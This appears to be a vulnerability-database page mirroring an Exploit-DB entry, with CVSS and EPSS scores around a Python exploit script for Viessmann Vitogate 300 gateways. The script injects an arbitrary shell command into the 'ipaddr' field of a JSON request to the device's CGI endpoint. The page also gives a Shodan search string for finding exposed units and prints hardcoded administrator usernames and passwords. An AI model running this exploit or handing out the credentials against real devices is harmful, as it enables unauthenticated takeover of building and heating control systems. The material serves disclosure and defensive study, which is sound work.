Lucene search

ByteHunterEDB-ID:51887

HistoryMar 14, 2024 - 12:00 a.m.

Viessmann Vitogate 300 2.1.3.0 - Remote Code Execution (RCE)

2024-03-1400:00:00

ByteHunter

www.exploit-db.com

143

viessmann vitogate 300

remote code execution

shodan dork

cve-2023-5702

cve-2023-5222

bytehunter

hardcoded credentials

exploit

http

request headers

json payload

target ip

target port

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

5.8 Medium

CVSS2

Access Vector

ADJACENT_NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:A/AC:L/Au:N/C:P/I:P/A:P

0.002 Low

EPSS

Percentile

52.7%

JSON

#- Exploit Title: Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE)
#- Shodan Dork: http.title:'Vitogate 300'
#- Exploit Author: ByteHunter
#- Email: [email protected]
#- Version: versions up to 2.1.3.0
#- Tested on: 2.1.1.0
#- CVE : CVE-2023-5702 & CVE-2023-5222


import argparse
import requests

def banner():
    banner = """
    ╔═══════════════════════════════════╗
             CVE-2023-5702   
           Vitogate 300 RCE
           Author: ByteHunter      
    ╚═══════════════════════════════════╝
    """

    print(banner)


def send_post_request(target_ip, command, target_port):
    payload = {
        "method": "put",
        "form": "form-4-7",
        "session": "",
        "params": {
            "ipaddr": f"1;{command}"
        }
    }

    headers = {
        "Host": target_ip,
        "Content-Length": str(len(str(payload))),
        "Content-Type": "application/json"
    }

    url = f"http://{target_ip}:{target_port}/cgi-bin/vitogate.cgi"


    response = requests.post(url, json=payload, headers=headers)

    if response.status_code == 200:
        print("Result:")
        print(response.text)
    else:
        print(f"Request failed! status code: {response.status_code}")

def main():
    parser = argparse.ArgumentParser(description="Vitogate 300 RCE & Hardcoded Credentials")
    parser.add_argument("--target", required=False, help="Target IP address")
    parser.add_argument("--port", required=False, help="Target port",default="80")
    parser.add_argument("--command", required=False, help="Command")
    parser.add_argument("--creds", action="store_true", help="Show hardcoded credentials")

    args = parser.parse_args()

    if args.creds:
        print("Vitogate 300 hardcoded administrative accounts credentials")
        print("Username: vitomaster, Password: viessmann1917")
        print("Username: vitogate, Password: viessmann")
    else:
        target_ip = args.target
        target_port = args.port
        command = args.command

        if not (target_ip and command):
            print("Both --target and --command options are required.\nor use --creds option to see hardcoded Credentials.")
            return

        send_post_request(target_ip, command,target_port)

if __name__ == "__main__":
    banner()
    main()

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

5.8 Medium

CVSS2

Access Vector

ADJACENT_NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:A/AC:L/Au:N/C:P/I:P/A:P

0.002 Low

EPSS

Percentile

52.7%

JSON

Related for EDB-ID:51887